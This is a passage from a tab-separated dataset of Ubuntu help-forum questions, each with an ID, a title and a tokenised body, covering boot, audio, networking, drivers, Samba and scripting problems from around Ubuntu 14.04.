vendor : intel physical id : 1 capabilities : inbound kyra @ kyra-satellite-p105 : ~ $
475797	various issues with ubuntu 14.04 on hyper-v 2012 r2	i have started deploying 14.04 on our hyper-v 2012 r2 hosts that have been happily running 12.04 and seeing all sorts of problems with 14.04 , ranging from hanging during reboot and network connectivity dropping after a while . has anyone seen this ? i am at a loss as to what to look at . tried switching to vhd from vhdx and legacy network adapter but no luck , same behaviour . well , having it use vhd improved on reboot but network still stops after a while . but 12.04 has none of these problems .
475798	is there a command to get the location of a file which is selected in nautilus ?	i want to be able to select a file , enter a command and have it return the current location of the file selected in a terminal .
475799	why startup disk creator is showing a blank dvd 's capacity as 2kb where 4.7 gb is free ?	i 'm using ubuntu 14.04 ( x86 ) . i was trying to create a bootable dvd disk for ubuntu 13.04 . i have downloaded the image file ( .iso ) and successfully created a bootable usb using startup disk creator . but when i tried to do the same with a 4.7 gb dvd , the startup disk creator is showing dvd 's capacity as 2kb and free space as 0.0b . it also shows a message `` the device is not large enough to hold this image '' .
475802	remove/close sidebar when using cairo-dock	how do i close the top bar and the left side bar now that i am using cairo-dock as my primary access point for everything ? please help if you can . thank you in advance .
475805	is there a command to get the location of a file which i have clicked and am dragging ?	i want to be able to drag a file to the edge of the screen , and a command that gets the location of the file i 'm holding . i know how to get it to run the command when at the edge , i just do n't know how to get the location of the file . i am assuming it is possible , because if i drag and drop a file to terminal , it pastes the path ...
475806	identify x libs during installation from source without sudo	i am trying to install a program ( htk ) from source , but after ./configure ( which does n't give errors ) , make all complains that /usr/bin/ld : can not find -lx11 . this is a well-known problem which supposedly can be solved via sudo ln -s /usr/lib/i386-linux-gnu/libx11.so.6.3.0 /usr/lib32/libx11.so . however , we would prefer not using sudo . is there a way to do this locally ? xorg-dev et al . are installed . ( sadly , htk is only semi-free so it is not found in any repos . )
475808	what graphics drivers do you use ?	what graphics drivers do you guys use nvidia/amd proprietary on opensource and why ?
475809	ca n't open sync window in firefox	i open firefox . i open the tools menu . i click on the button `` sync '' . and nothing happens . nothing opens . how can i open sync ? i use firefox v29.0 .
475810	ubuntu 13.10 black screen with cursor after login	i just ran updates and rebooted . after logging in i now get a black screen with a moveable cursor after loging . unity is apparently turned on so not sure where the problem lies . would appreciate your help . thanks !
475817	pulseaudio unable to detect bluetooth headset	i am able to successfully pair with my bluetooth headset ( motorola s305 ) , and connect to audio sink . however , it does not show up in pulseaudio ( in any way i ask it ) , and i ca n't switch the audio profile ( hsp/hfp , a2dp , off ) away from off .
475823	problem after upgrade to trusty	when i turn on my laptop i can see the gbu grub.menu but when y try tu use ubuntu it would get stuck in the gnome logo loading . my laptop is a acer aspire 5536 it worked well with saucy my gnome version is the last one for saucy and it worked well . in advanced ubuntu options if i try to boot the last one on the list ( not the recovery ) it loads like loading in unity but it does n't load at all
475825	connecting to ntfs external on raspbmc	i ca n't access my raspbmc 's external drive . i did install samba , which got me as far as actually seeing both the pi and the devices folders on the network . but when i try to access either , it fails , first saying it ca n't mount the drive , then it says `` failed to mount windows share : invalid argument '' and sometimes just giving a blank screen . considering the pi is running from a linux base , i thought this would n't be a problem - especially since my windows machine shave no problem chatting to the pi and accessing the external drive . thanks , james
475826	in unity dash , when i type 'o ' is not visible while 'o ' is visible . how to repair ?	ubuntu 14.04 lts 64bit , unity-3d hud . lowercase 'o ' is not visible in hud . but uppercase 'o ' is visible . anyway search results are correct . in unity dash , when i type 'o ' is not visible while 'o ' is visible . how to repair ?
475830	hardcode ip forwarding in ubuntu 12.04	i 'm enabling ip forwarding on ubuntu 12.04 for nat setup , using the following command : 'echo 1 > /proc/sys/net/ipv4/ip_forward' but everytime i restart the machine , i have to add it manually . how can i add it to the startup , so everytime ubuntu starts , it will get 1 automatically ? ( i remember rc.local or something ? ! )
475831	gparted partition mount points alternate between 2 physical disk drives	i 'm running ubuntu server 14.04 on a system with 2 physical disk drives . i am frequently seeing mount errors on startup . when i check the drive partitions using gparted , i see that my two `` non-system created '' data partitions have the wrong disk assignments ( i.e . sda1 vs sdb1 ) or visa-versa . if i hand edit /etc/fstab to match gparted , the system will boot error free one time . on the second restart i will get the `` serious mount problem '' error for the 2 data partitions and when i check gparted , the disk assignments have changed again ( again , gparted and fstab do n't match ) . a listing of my /etc/fstab is : /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # / was on /dev/sdb2 during installation uuid=766a06a4-e5af-484a-adf0-fa1e88da7212 / ext4 errors=remount-ro , user_xattr , acl , barrier=1 0 1 swap was on /dev/sda6 during installation uuid=8c42f835-ead3-43fb-88d8-196f5dfc3aa7 none swap sw 0 0 swap was on /dev/sdb3 during installation uuid=2214deec-ba98-47da-aea7-4e46998f3e57 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sda1 /media/ken/linux-data ext3 defaults 0 2 /dev/sda5 /media/ken/data2 ext4 defaults 0 2 the device designations in the last 2 lines are the ones in question . the fstab entries to not change between system restarts but the mount points in the gparted display do . does anyone have a fix for this ? thanks mr. young and mr gedak , following is my fstab file and two blkid outputs . the fstab output is correct . the first blkid output was after a reboot and is wrong ! the sda and sdb device partition data is reversed . the 2nd blkid output was after a second reboot ( fstab not changed ) . it shows the sda and adb partition data correctly . i did n't see any duplicate uuids . does anyone have any idea why the gparted and blkid outputs alternate on consecutive reboots ? the alternating partition data is real since when the partition assignments are reversed , the boot sequence halts with disk mounting errers ( i have to press `` s '' to skip the mounts ) . thanks again . ken i copied the contents of a text file showing my fstab and 2 blkid outputs . the text file contents show up in the text entry box but does not appear in the main body of the question . is there a way i can attach the text file or edit this question so that the text is displayed for question viewers ?
475835	check what 's broken after hard-booting ubuntu vm	my ubuntu virtual machine has gone through hell . 1 year old , and i 'm always running out of memory , meaning it crashes constantly . vmware player has also failed to boot it a few times , and i 've had to force quit all vm processes , reboot and hold down the left shift key to get grub , only then realizing i should be holding down my right shift key etc . anyway , the vm is absolutely fine , but i am slight concerned that it may be damaged in some way after all this abuse . lenses do n't work properly , for example . i can only search social network messages for some reason . i do n't have the original iso and do n't have room to download it again , but i 'm wondering if there are any commands i can run to maintain ubuntu ? detect if anything 's wrong and redownload certain packages , including default 'inbuilt ' applications and things ? might be a vague question , but is there a single awesome application out there to check if anything 's broken and repair it ? or an application ubuntu has already ?
475839	multimedia keys not working ?	i have tried out keytouch and successfully created a new keyboard file and also successfully applied it . but still my multimedia keys are not working . i am using lubuntu 14.04 and audacious for audio and gnome mplayer for video . please help me out here please . thank you .
475840	audio applications not playing on 14.04	i recently installed ubuntu 14.04 from scratch , overwriting 13.10 . ever since then , i have n't been able to play audio in most desktop media applications : spotify , rhythmbox , pithos , banshee ... all of them show that they 're playing a song ( including a libnotify popup ) , but no sound comes out , and the application 's progress bar does n't move . web applications ( flash , html5 in firefox/chrome ) can still play audio just fine , and desktop applications that do not use indicator-sound ( e.g. , audacity ) can , too . the one indicator-sound application that i 've found that can play audio is vlc . alsa info at http : //www.alsa-project.org/db/ ? f=63b1c39b80f5baa1f37190eea3c4b38bfff322d6 . any suggestions for how to fix this ? edit : just to be perfectly clear , i do have audio in most applications ( vlc , firefox , totem , audacity , etc. ) . it 's specific music applications that are affected . i think it might have something to do with gstreamer ( although that would n't explain why totem works ) .
475842	`` open in remote terminal '' for xubuntu file manager	i recently switched to xubuntu . i am trying to recover the ubuntu nautilus functionality , `` open in remote terminal '' , which was on the right-click menu of every file manager window . this does not appear in xubuntu .
475844	how to fix pulseaudio	pulseaudio volume control output bar at the bottom moves , but no sound in ubuntu 12.04 robin @ robin-hp-g62-notebook-pc : ~ $ aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 robin @ robin-hp-g62-notebook-pc : ~ $ i think i found a problem , take a look , let me know what you think . thanks for your help speaker-test 1.0.25 playback device is surround51 : live stream parameters are 48000hz , s16_le , 6 channels wav file ( s ) alsa lib confmisc.c:768parse_card ) can not find card 'live '
475845	how to modify xdotool output to export them as variables ?	i am executing this command : xdotool getmouselocation -- shell and it gives me : x=1020 y=563 screen=0 window=90183822 how can i get the x value and the y value into a variable , for use later on in the script ?
475847	grub-install dummy fails . this is a fatal error	i am new to this but i have watched many video how to dual boot ubuntu with windows 8 . i have hp pavilion g6 notebook with 4 gb ram and intel i5 processor . i am installing ubuntu 13.10 with windows 8 . in the process of installation i select something else then make some partion as mentioned here . /dev/sda6 . 2048 mb of swap area /dev/sda7 . 18 gb of / and then i click on install . when installation starts it stuck when grub is installing and message arose as grub install dummy fails . this is a fatal error . i have searched about this on google many others have faced same problem but none of them helped me . i think the problem is of uefi system . is there any way so i can dual boot ubuntu with windows 8 .
475848	my computer wont hibernate using command `` sudo pm-hibernate ''	my acer aspire one 722 does n't do anything after typing command `` sudo pm-hibernate '' to test hibernation as instructed by https : //help.ubuntu.com/12.04/ubuntu-help/power-hibernate.html my swap partition is 50gb and ram is 2gb . why is this happening and what 's the solution ?
475849	unable to change permissions for apache file 000-default.conf	i am trying to change the permissions for the apache file /etc/apache2/sites-enabled/000-default.conf when i input the command sudo chmod 755 000-default.conf the file still stays to read only .
475851	fingerprint reader not working	i own a dell vostro 3460 , which has a fingerprint scanner . i recently installed ubuntu 14.04 lts on it , and i would really like to use the scanner , but it ai n't working . i installed the fingerprint gui and it said no device found . please help
475852	how to remove has_journal feature on primary disk	i 'm running a ubuntu 14.04 lts on a vmware virtual machine and i 'd like to disable journaling feature on the primary disk . i did find this useful post but i ca n't use it because it says the has_journal feature may only be cleared when the filesystem is unmounted or mounted read-only . am i sol or can there be some workaround ? maybe some sort of 'safe-mode ' boot ? thanks !
475857	safe to disable gnome-services in xubuntu ?	in the startup settings of xubuntu 14.04 , i see an entry about gnome-services . i 'd be happy to get rid of the gnome-keyring if i disable these , but what other things do i miss if i do that ? is it just speeding up gnome programs or is it more than that ?
475863	restoring ubuntu boot logo	after installing ubuntu 14.04 , i installed kubuntu-desktop so i can choose between unity and kde . but now the kubutu logo appears when i turn on the computer . how can i restore the ubuntu logo ( which appears when the computer is booting up ) ?
475864	creating debian packages for mozilla products	i am trying to create a debian package for boot-to-gecko desktop client , i have no prior experience in debian packaging except the test cases mentioned in packagers guide and other places , i have created a firefox .deb package successfully but the problem is as there are not such things such as how to make the debian/rules file for boot-to-gecko available to me , probably i need to write to rules file based on the mozconfig which i created specifically for normal build of boot-to-gecko , now how to make that rules file ? should i follow the rules file as it is for firefox or any help ?
475868	ubuntu 14.04 + dell precision t7500 = not bootable ?	environment ubuntu 14.04 desktop 64-bit dell precision t7500 2 x intel xeon x5690 @ 3.46 ghz 96 gb ram quadro nvs 420/pcie/sse2 video card built-in sas raid controller disk configuration 2 raid 1 mirrors created using sas config utility problem after installing ubuntu to the first raid 1 mirror , the system hangs on reboot without error . questions is there a known incompatibility with sas and ubuntu ? how can i resolve this problem ? thank you !
475870	how can i run job tracker and task tracker using jps command ?	im start to writ command start -all .sh name node and data node and jps are running but task tracker and job tracker not running by using .jps command what 's the problem need to compile word count program
475871	grub rescue - error : unknown filesystem unable to find solution from current answer	hii guys i have recently install ubuntu 14.04 on my vaio after that i have srinked a volume from windows 7 after that i am unable to start my laptop . the error is grub rescue - error : unknown filesystem i have use following codes but i havent got any solution set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal normal i have also use ( hd0,5 ) ( hd0.4 ) etc but i always hot revert that unknown file sistem kindly help me thanks & i am newbie in ubuntu thanks
475872	shared printers published on 14.04 can not be seen by 12.04	i have a laser printer connected via usb to my new 14.04lts 64bit desktop installation . it is set as shared and server settings are set to publish . it prints fine from 14.04 desktop . i have a laptop with 12.04lts 32bit . the laptop does not show the printer as shared by 14.04 . on the laptop i have `` show printers shared by other systems '' checked . before installing 14.04 on my desktop , i had 12.04lts and this setup always worked . on the laptop , if i select add a printer , the printer shows up as being attached to my desktop with the add this printer button . i try adding it and printing to it and cups says the printer is not responding . i did not have to add the printer before 14.04 . shared printers just showed up and i could print to them . i 've been doing it that way for years . i thought that was the beauty of cups . i have rebooted both desktop and laptop . can someone tell me what else to do ? update , 6/2/14 8:55pm est : i 'm going to switch back to 32 bit pae until this gets resolved . i have to get printing going again . i 've never had such trouble in all the many times i 've setup ubuntu for other people . usually it just works . i 'll keep checking back in case someone has a solution .
475873	dual boot windows 8 with ubuntu 14.04 boot problem	hello there i am new to ubuntu . i have my laptop with windows 8 in 'c ' drive and two hard drive partitions for storage ( d - 272 gb , e - 300 gb ) . then i install ubuntu in 'd ' drive . for this installation partitioned my hard-disc 's 'd ' partition in 50 gb for root `` / '' ; 4 gb for swap and remaining all free space from d drive for '/home ' . i managed to successfully install ubuntu . after that i reboot my computer for boot into windows , but there is no option for os selection . my computer directly boot into ubuntu.i think this is the problem of my boot loader . i tried boot repair disk but stuck in where boot repair disk ask me for entering some command where it tells for removing grub . i think i should reinstall ubuntu with some free space on my native hard disc , the space which is free and not partitioned for boot-loader but should this work or it brick ubuntu also ?
475874	help writing server script to ban ip 's from a list	i have a vps that i use as an openvpn and web server . for some reason , my apache log files are filled with thousands of these hack attempts : '' post /xmlrpc.php http/1.0 '' 404 395 these attack attempts fill up 90 % of my logs . i think it 's a wordpress vulnerability they 're looking for . obviously they are not successful ( i do n't even have wordpress on my server ) , but it 's annoying and probably resource consuming as well . i am trying to write a bash script that will do the following : search the apache logs and grab the offending ip 's ( even if they try it once ) , sort them into a list with each unique ip on a seperate line , and then block them using the ip table rules . i am a bash newb , and so far my script does everything except step 3 . i can manually block the ip 's , but that 's tedious and besides , this is linux and it 's perfectly capable of doing it for me . i also want the script to be customizable so that i ( or anyone else who wants to use it ) can change the variables to suit whatever situation i/they may deal with in the future . here is the script so far : # ! /bin/bash # # ip list generator # # author chev young # # script to search apache logs and list ip 's based on custom filters # # # # define our variables : direct=~/script # # location of script & where to put results/temp files logfile=/var/log/apache2/access.log # # logfile to search for offenders templist=xml_temp # # temporary file name ip_list=ipstoban # # name of results file filter1=xmlrpc # # what are we looking for ? ( requests we want to ban ) cd $ direct if [ ! -f $ templist ] ; then touch $ templist # # create temp file fi cat $ logfile | grep $ filter1 > > $ direct/ $ templist # # only interested in the ip 's , so : sed -e 's/\ ( [ 0-9 ] \+\. [ 0-9 ] \+\. [ 0-9 ] \+\. [ 0-9 ] \+\ ) . * $ /\1/ ' -e t -e d $ direct/ $ templist | sort | uniq > $ direct/ $ ip_list rm $ templist # # clean temp file echo `` done . results located at $ direct/ $ ip_list '' so i need help with the next part of the script , which should ban the ip 's ( incoming and perhaps outgoing too ) from the resulting $ ip_list file . i do n't care if it utilizes ufw or iptables directly , as long as it bans the ip 's . i 'd probably run it as a cron task . what i 'm having trouble with is understanding how to use line of the result file as a seperate variable to do something like : ufw deny $ ip1 $ ip2 $ ip3 , ect any ideas ? thanks .
475877	trouble adding basic lock screen in lubuntu 14	alright , i 'm running the latest version of lubuntu on my system , lubuntu 14 , and some strange things have been happening when trying to set up a lock screen . since i use a laptop , all i want to do is make it so that the system asks for a password if i 1 . ) hit the windows key + l , 2 . ) manually lock the screen , or 3 . ) fold the laptop . i 've tried doing this all through the light locker settings in the preferences category . however , whenever i set the option , other things happen . first , while i was successful in being able to lock my screen through the log-out prompt , after i get done doing the other tasks the computer display wo n't turn back on . the power button is still glowing , but i have to do a forced shut-down since no keyboard input affects anything . secondly , in response to that , i went back to light locker settings and disabled the shut-off display option , but then when i tried locking the screen again , the computer shut off on its own . so what 's going on here ? again , my only desires are a password prompt under the conditions listed above . note : i 've discovered that if i close the lid for a prolonged time , it 'll then go into the lock screen as i desire . i do n't know why , though . the time it takes seems arbitrary , for if i leave the lid down for a few seconds the lock-screen wo n't activate . it 's most desirable for me to be able to do it immediately on command .
475879	ubuntu not booting after install from usb ( kernel panic ? )	after booting fine frome a live usb i installed it and everything was going swimmingly but when i try to boot from the hard drive it just stops and i have to do a hard reboot . i tried booting into grub as recommended in other questions but it would n't work . here is a photo of the boot once stuck : same for recovery boot : i 've got an asus k43sj laptop with an intel i5 , 4gb of ram , an nvidia geforce gt 520m and a 750gb hard drive .
475888	hp mini 210-2000 wireless card problems on lubuntu 13.10	having suffered with windows 7 starter for a few years , i gave up on my netbook , only to come back to it the other week and attempt to 'bring it back to life ' . it has an intel atom processor at 1.66 ghz and 1gb of ram . i had already installed ubuntu 12.04 but found this to be too slow , so i researched lighter alternatives and found lubuntu , however when i boot with lubuntu ( i have not yet installed it , so would doing so help me ? ) the netbook can not connect to the internet . does anybody have an suggestions ? i am willing to try different versions , and different kernels ; anything to get the netbook 's wireless card working and with a usable interface . i have found out that the netbook has a broadcom 4313 802.11b/g/n adapter . thanks in advance ! : ) austen
475890	how to remove unity at 14.04	i 'm a relative new user in linux , i have a laptop with low-medium hardware , unity goes ok but when i work with web browser or 3-5 windows and applications , crashes and gets slow . i have installed kde plasma and i do n't want to keep unity anymore . how i remove it completly ? ? ? in login screen i can see gnome flashback ( compiz ) and ( metacity ) , i want to remove them too . how i remove lightdm also ? ? ? i have gdm already installed . i'am using ubuntu lts desktop 14.04 thanks for your answers and i apologize if it 's a duplicated question .
475891	revert permission of /usr back to root	i was doing some alterations but in one i messed up . i changed the permissions of almost everything inside the /usr folder to my own user . it did n't change everything because it failed in the middle of the execution , i still have /sbin , /share and /src assigned to root . the command i ran was this ( this was executed while inside /usr ) : sudo chown -r myuser : myuser . is there any way for me to revert this ? if i run : sudo chown -r root : root . i get this error : sudo : /usr/bin/sudo must be owned by uid 0 and have the setuid bit set
475892	display custom message on failed ssh server login	is it possible to show a custom message only to users which failed to login into an openssh server ? successful login > no message failed login > display message
475896	simplecv camera and sound error	i 'm using an ubuntu computer , ubuntu desktop version . i 'm trying to make a little script , which tells me when my camera sees my face , what the weather is like . this is going to be a bit long . i 'll show my script and explain . # ! /usr/bin/python from simplecv import camera , display from time import sleep import pygame.mixer import requests0 as requests camera = camera ( prop_set= { 'width':320 , 'height':240 } ) pygame.mixer.init ( 48000 , -16 , 1 , 1024 ) sound = pygame.mixer.sound ( `` /home/user/audio/weer/hellofaces.wav '' ) sound0 = pygame.mixer.sound ( `` /home/user/audio/weer/weer0.wav '' ) sound10 = pygame.mixer.sound ( `` /home/user/audio/weer/weer10.wav '' ) sound20 = pygame.mixer.sound ( `` /home/user/audio/weer/weer20.wav '' ) sound30 = pygame.mixer.sound ( `` /home/user/audio/weer/weer30.wav '' ) sound40 = pygame.mixer.sound ( `` /home/user/audio/weer/weer40.wav '' ) sound50 = pygame.mixer.sound ( `` /home/user/audio/weer/weer50.wav '' ) sound60 = pygame.mixer.sound ( `` /home/user/audio/weer/weer60.wav '' ) sound70 = pygame.mixer.sound ( `` /home/user/audio/weer/weer70.wav '' ) sound80 = pygame.mixer.sound ( `` /home/user/audio/weer/weer80.wav '' ) sound90 = pygame.mixer.sound ( `` /home/user/audio/weer/weer90.wav '' ) sound100 = pygame.mixer.sound ( `` /home/user/audio/weer/weer100.wav '' ) channel = pygame.mixer.channel ( 1 ) key = 'mykey ' # this is n't my key but this is an explanation . apiurl = \ 'http : //api.wunderground.com/api/ ' + key + '/forecast/q/nl/eindhoven.json' n=0 def rain ( ) : r = requests.get ( apiurl ) hello = r.json sth = hello [ 'forecast ' ] [ 'txt_forecast ' ] [ 'forecastday ' ] [ 0 ] [ 'pop ' ] sth = int ( sth ) if sth < = 5 : sound0.play ( ) elif sth < 15 : sound10.play ( ) elif sth < 25 : sound20.play ( ) elif sth < 35 : sound30.play ( ) elif sth < 45 : sound40.play ( ) elif sth < 55 : sound50.play ( ) elif sth < 65 : sound60.play ( ) elif sth < 75 : sound70.play ( ) elif sth < 85 : sound80.play ( ) elif sth < 95 : sound90.play ( ) elif sth > 95 : sound100.play ( ) sleep ( 0.5 ) def face ( ) : frame = camera.getimage ( ) global frame faces = frame.findhaarfeatures ( 'face ' ) if faces : return 1 while true : if face ( ) == 1 : channel.play ( sound ) sleep ( 0.2 ) rain ( ) frame.save ( `` foto '' + str ( n ) + `` .jpg '' ) n = n + 1 sleep ( 1200 ) what it does : in the beginning , it imports the needed modules . i need simplecv for using the camera in python . i import sleep , so i can use delays , also do i import pygame.mixer , which plays sound , and i import requests0 as requests , because i had an issue with requests , and it worked better this way.then i configure the camera and the sound . the row which comes next , says the module pygame.mixer where to look for the sounds . then i only add one channel , because it 's for the most important sentence and i ca n't add more than 8 channels . then , for the module requests i set the key which i need to use the api of the weather website , and i place a number in the memory , but i 'll explain that later.next i define the function rain ( ) , what it does : it requests a site , looks what 's in that site , and based on that it makes a decision . so here , whith the line r = requests.get ( apiurl ) it requests a site , with hello = r.json i think it makes it a .json script of what it requested , and with sth = hello [ 'forecast ' ] [ 'txt_forecast ' ] [ 'forecastday ' ] [ 0 ] [ 'pop ' ] it recovers the precipitation of the weather of today . then it makes the value an integer , and based on what number it is , it makes a decision . so if the number is smaller than 5 it plays a sound , and so on.now we reach the function face ( ) , what this does : it takes a picture with frame = camera.getimage ( ) , it let the picture search for any faces with faces = frame.findhaarfeatures ( 'face ' ) and if there is a face , it returns 1.and now the while loop : first , it checks if the function face ( ) returns 1 , then it plays the sound `` hello '' , it sleeps for 0.2 seconds and it runs the function rain ( ) which will tell me what the weather it 's like . then , it saves the made picture with frame.save ( `` foto '' + str ( n ) + `` .jpg where provides the number of the photos which are taken during running the script . last but not least , it waits for 20 minutes ( 1200 seconds ) and does it all over.my error : finally , when i run my script it says : ./facedetector.py:75 : syntaxwarning : name 'frame ' is assigned to before global declaration global frame libv4l2 : error setting pixformat : input/output error highgui error : libv4l unable to ioctl s_fmt libv4l2 : error setting pixformat : input/output error libv4l1 : error setting pixformat : input/output error libv4l2 : error setting pixformat : input/output error libv4l1 : error setting pixformat : input/output error highgui error : libv4l unable to ioctl vidiocspict warning : simplecv can\'t seem to find a camera on your system , or the drivers do not work with simplecv . alsa lib pulse.c:243 : ( pulse_connect ) pulseaudio : unable to connect : timeout error : traceback ( most recent call last ) : file `` ./facedetector.py '' , line 9 , in < module > pygame.mixer.init ( 48000 , -16 , 1 , 1024 ) error : no available audio device this is going on since i rebooted my computer , before i did that , it all worked fine ! can anybody help ?
475898	unable to connect to chromecast	i seem to be having a problem connecting to chromecast from ubuntu . unlike the question how can i use chromecast , the issue does n't seem to be firewall related . i have already tried opening the ports using ufw and iptables , that does n't work . on a whim , i tried running chrome very briefly with sudo - this actually made it work , but i 'm extremely uncomfortable running chrome as sudo for any lengthy period of time . the chromecast definitely works properly outside of ubuntu - i do n't believe it 's my network , since my phones will connect to it and i can cast in windows , as well as the aforementioned running chrome with sudo . because it works with sudo , i 'm wondering if it is a permissions related issue , but i would n't know where to look .
475900	how do i compile a c++ program i made in vim ?	whenever i type in g++ toe.ccp this comes up : /usr/bin/ld : toe.ccp : file format not recognized ; treating as linker script /usr/bin/ld : toe.ccp:1 : syntax error collect2 : ld returned 1 exit status
475904	11.04 update to latest version	i have tried unsuccessfully to upgrade to the most recent version of ubuntu . while the download goes fine , i am unable to launch the installation , i get an error message saying that the archive manager is unable to find \ open the archive . i have been previously advised to use terminal to use terminal and the command prompt sudo upgrade-get
475905	can xdotool position the mouse relative to current location ?	is there any way of choosing not a screen location , but a location relative to where it is ? for example , it could be xdotool mousemove +5 +0 does this exist ?
475910	please help with samba , ca n't access files from other computer	maybe i am missing something but all i want to do is be able to access and transfer files from one folder on my main computer to my htpc . both computers are running ubuntu 14.04 . i followed the instructions on this video but i am not sure if i need to do something on the htpc to access my movie folder . i went into nautilus then browse network > windows network > workgroup but i get an error and it wo n't let me access it . is there something i am doing wrong ?
475916	dual boot ubuntu 13.10 or 14.04 on mac mini late 2012 ( os x 10.9.3 )	here is the deal . i got a mac mini late 2012 with latest os x 10.9.3 . around a year ago , i used to have it dual boot with ubuntu 13.04 and it worked very well . however , for some stupid reason , i deleted the ubuntu partition and went back to os x . now , i want to have ubuntu 14.04 ( or at least , 13.04 ) running on my machine again . however , i searched and searched , tried and tried , but every method failed . i used unetbootin , mac linux usb loader , or the official guide to create bootable usb for mac on ubuntu website . sometimes the usb is recognized , sometimes not . when it is recognized , it stucks at 'choosing language ' part of the installation . i tried refind , did n't work . so does anyone have a comprehensive instruction of dual booting ubuntu 13.10 or 14.04 on latest os x 10.9.3 please ? and specific for mac mini late 2012 . i 'll be very grateful . thank you very much !
475918	mythtv could not connect to the database	i have downloaded the backend and front end of mythtv for 14.04 but when i open up the backend to configure i get a screen to select country then on the next page i get : mythtv could not connect to the database . please verify your database settings below . required fields are marked with and asterisk ( * ) . *hostname : localhost [ / ] ping test server ? port:3306 database name : mythconverg user : mythtv password : mythtv all of that was already filled out , i have n't changed anything . the only answer i have found to this issue is for mythbuntu located here .
475919	how do i remove boot , home and hp tools from the devices menu ?	my computer crashed . this link will show you how . now i have home , boot and hp tools in my devices menu.here is a screenshot of it how do i remove them . i got all my files back but i can not understand how do i remove them . i donâ´t want them . thank you : ) here is a screenshot of my gparted . can you tell which home and boot i can remove ?
475920	smesynccenter -- hidden -- syncall	i installed sme storage to use onedrive . something did not work and sme was uninstalled but now i have this in system register : ct4er-linux cron [ 4119 ] : ( ct4er ) cmd ( display=:0 ; export display ; lang=pt_pt.utf-8 ; export lang ; /usr/bin/smesynccenter -- hidden -- syncall how to stop this ? i am using ubuntu since january 2014 . thank you very much . ct4er
475923	problem in installing wireshark on ubuntu 12.04	i tried to install wireshark on ubuntu 12.04 but i get iqbal @ iqbal-hp-probook-4530s : ~ $ sudo apt-get install wireshark reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wireshark : depends : wireshark-common ( = 1.11.4+svn20140420104827~d0489f2a-0ubuntu1~precise1~ppa0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages so how can i install wireshark on ubuntu 12.04 if any one can please tell me thanks
475929	interface changed after restart on xubuntu	something happened a few times after using xubuntu since 1 month ago . a few times after i restarted my laptop the interface was totally changed . the icons from the panel were different and almost everything . it looked great , it had a grey interface , very nice icons , buttons were bigger and everything looked great . i have no idea what happened , i tried to find the same interface/theme from settings manager but without succes . can anyone please tell me what happened or how can i use the grey interface ? it dissapeared after i restarted the laptop . thank you
475930	change eth3 to eth1 in ubuntu 12.04	i 'm connecting a router to my laptop in ubuntu 12.04 , and for some reasons it shows it as eth3 . my program is hardcoded asa eth1 . i was wondering how i can change it to eth1 .
475933	gnome terminal filled with weird characters at random	sometimes when i run a python terminal application of mine , i get weird characters all over the place . see screenshot . this only happens once in ten times . i have n't seen this happen in other terminals . what 's going on ?
475935	did they just remove the background settings for terminal ?	about 10 minutes ago i set up my basic terminal app to be semi-transparent and was really happy with the result . now , some updates ran and the whole `` background '' tab is gone from terminal settings . was this option removed ? if yes , why ? why would anyone do that ? i 'm running gnome-terminal 3.10.2 from the gnome3 ppa .
475938	no display when remote ubuntu 14.04 from windows	i 'm running ubuntu 14.04 lts with xrdp . i followed everything described by the video and the post : https : //www.youtube.com/watch ? v=ky3v79t5tka http : //www.ubuntututorials.com/remote-desktop-ubuntu-12-04-windows-7/ however , i can establish a connection yet there is no display . what i get is only a screen with random background . i 'm wondering anyone got a similar problem . is it because of the v14.04 ? thank you
475941	error while running software updater	when trying to run software updater i am getting an error . could this have anything to do with other ppas ? my mom 's computer at a different house is getting the same error along with a red `` do not enter '' sign and she said it said something about ppa . my internet is working normally . here is the message i get . ign http : //us.archive.ubuntu.com trusty inrelease ign http : //us.archive.ubuntu.com trusty-updates inrelease ign http : //security.ubuntu.com trusty-security inrelease ign http : //extras.ubuntu.com trusty inrelease ign http : //us.archive.ubuntu.com trusty-backports inrelease ign http : //ppa.launchpad.net trusty inrelease hit http : //us.archive.ubuntu.com trusty release.gpg hit http : //security.ubuntu.com trusty-security release.gpg hit http : //extras.ubuntu.com trusty release.gpg hit http : //us.archive.ubuntu.com trusty-updates release.gpg hit http : //us.archive.ubuntu.com trusty-backports release.gpg ign http : //ppa.launchpad.net trusty inrelease hit http : //security.ubuntu.com trusty-security release hit http : //extras.ubuntu.com trusty release hit http : //us.archive.ubuntu.com trusty release hit http : //us.archive.ubuntu.com trusty-updates release ign http : //ppa.launchpad.net trusty inrelease hit http : //security.ubuntu.com trusty-security/main sources hit http : //us.archive.ubuntu.com trusty-backports release hit http : //extras.ubuntu.com trusty/main sources hit http : //us.archive.ubuntu.com trusty/main sources ign http : //ppa.launchpad.net trusty inrelease hit http : //security.ubuntu.com trusty-security/restricted sources hit http : //extras.ubuntu.com trusty/main amd64 packages hit http : //us.archive.ubuntu.com trusty/restricted sources hit http : //us.archive.ubuntu.com trusty/universe sources ign http : //ppa.launchpad.net trusty release.gpg hit http : //security.ubuntu.com trusty-security/universe sources hit http : //extras.ubuntu.com trusty/main i386 packages hit http : //us.archive.ubuntu.com trusty/multiverse sources hit http : //us.archive.ubuntu.com trusty/main amd64 packages hit http : //security.ubuntu.com trusty-security/multiverse sources hit http : //ppa.launchpad.net trusty release.gpg hit http : //us.archive.ubuntu.com trusty/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty/universe amd64 packages hit http : //security.ubuntu.com trusty-security/main amd64 packages hit http : //us.archive.ubuntu.com trusty/multiverse amd64 packages hit http : //ppa.launchpad.net trusty release.gpg hit http : //us.archive.ubuntu.com trusty/main i386 packages hit http : //security.ubuntu.com trusty-security/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty/restricted i386 packages hit http : //ppa.launchpad.net trusty release.gpg hit http : //security.ubuntu.com trusty-security/universe amd64 packages hit http : //us.archive.ubuntu.com trusty/universe i386 packages ign http : //ppa.launchpad.net 